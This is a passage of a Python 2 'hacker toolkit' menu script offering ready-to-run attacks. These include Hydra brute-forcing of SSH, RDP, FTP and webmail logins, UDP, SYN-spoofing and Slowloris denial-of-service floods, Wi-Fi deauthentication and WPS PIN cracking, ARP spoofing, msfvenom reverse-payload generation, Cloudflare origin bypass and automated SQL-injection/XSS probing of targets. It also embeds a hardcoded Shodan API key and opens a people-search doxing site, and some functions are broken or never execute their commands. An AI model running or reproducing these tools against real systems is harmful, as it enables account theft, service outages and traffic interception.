fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", 